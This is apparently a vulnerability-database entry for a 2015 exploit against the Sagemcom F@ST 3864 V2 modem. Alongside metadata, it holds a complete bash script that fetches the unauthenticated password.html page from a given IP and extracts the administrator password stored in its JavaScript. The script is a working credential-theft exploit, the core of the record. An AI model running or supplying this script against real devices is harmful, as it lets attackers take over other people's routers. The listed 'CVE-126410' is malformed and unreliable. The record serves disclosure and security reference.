ID
VAR-E-201508-0383
EDB ID
37801
TITLE
Sagemcom F@ST 3864 V2 - Get Admin Password - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Sagemcom F@ST 3864 V2 - Get Admin Password. CVE-126410. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | sagemcom | model: | f@st | scope: | eq | version: | 3864v2 | Trust: 1.0 |
vendor: | sagemcom | model: | [email protected] | scope: | eq | version: | 3864v2 | Trust: 0.6 |
EXPLOIT
#!/bin/bash
#########################################
# Exploit Title: Sagemcom 3864 V2 get admin password
# Date 2015-08-15
# Author: Cade Bull
# Software Link: null
# Tested on: Sagemcom F@ST 3864 V2
# Version: 7.253.2_F3864V2_Optus
#########################################
# The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms
# the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials
if [ "$1" != "" ]
then
    IP_ADDRESS="$1"
else
    echo "Usage : $0 IP_ADDRESS"
    exit 1
fi
USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O - | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" `
echo "admin password = $USER_PASSWORD"
Trust: 1.0
EXPLOIT LANGUAGE
sh
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Get Admin Password
Trust: 1.6
CREDITS
Cade Bull
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 37801 | Trust: 1.6 |
db: | EDBNET | id: | 58966 | Trust: 0.6 |
REFERENCES
url: | https://www.exploit-db.com/exploits/37801/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 37801 |
db: | EDBNET | id: | 58966 |
LAST UPDATE DATE
2022-07-27T10:03:04.826000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 37801 | date: | 2015-08-17T00:00:00 |
db: | EDBNET | id: | 58966 | date: | 2015-08-17T00:00:00 |